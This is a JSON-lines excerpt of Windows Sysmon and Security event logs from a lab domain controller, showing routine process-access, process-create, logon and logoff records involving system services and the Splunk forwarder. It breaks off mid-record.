{"EventTime":"2020-08-01 08:04:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6773,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:31.789\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21F5-5F25-0000-0010D2840A00}\r\nTargetProcessId: 4916\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:31.789","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21F5-5F25-0000-0010D2840A00}","TargetProcessId":"4916","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:04:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6774,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:31.804\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-220F-5F25-0000-00100AE00A00}\r\nTargetProcessId: 4916\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:31.804","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-220F-5F25-0000-00100AE00A00}","TargetProcessId":"4916","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220710,"ProcessID":864,"ThreadID":3168,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xAE655\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0xae655","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 08:04:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220711,"ProcessID":864,"ThreadID":3168,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0xAE655\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{77AE7113-A264-8FEA-3CEA-ABED442060A2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t50247\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0xae655","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{77AE7113-A264-8FEA-3CEA-ABED442060A2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"50247","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 08:04:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220712,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xAE655\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0xae655","LogonType":"3","EventReceivedTime":"2020-08-01 08:04:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6775,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:40.727\r\nProcessGuid: {41C8662E-2218-5F25-0000-00108DE70A00}\r\nProcessId: 2380\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nFileVersion: 10.0.10011.16384\r\nDescription: SplunkMonNoHandle Control Program\r\nProduct: Windows (R) Win 7 DDK driver\r\nCompany: Windows (R) Win 7 DDK provider\r\nOriginalFileName: SplunkMonNoHandle.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:04:40.727","ProcessGuid":"{41C8662E-2218-5F25-0000-00108DE70A00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","FileVersion":"10.0.10011.16384","Description":"SplunkMonNoHandle Control Program","Product":"Windows (R) Win 7 DDK driver","Company":"Windows (R) Win 7 DDK provider","OriginalFileName":"SplunkMonNoHandle.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 08:04:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6776,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:40.726\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-2218-5F25-0000-00108DE70A00}\r\nTargetProcessId: 2380\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:40.726","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-2218-5F25-0000-00108DE70A00}","TargetProcessId":"2380","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6777,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:40.726\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2218-5F25-0000-00108DE70A00}\r\nTargetProcessId: 2380\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:40.726","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2218-5F25-0000-00108DE70A00}","TargetProcessId":"2380","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:04:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6778,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:40.726\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:40.726","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6779,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:40.726\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:40.726","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 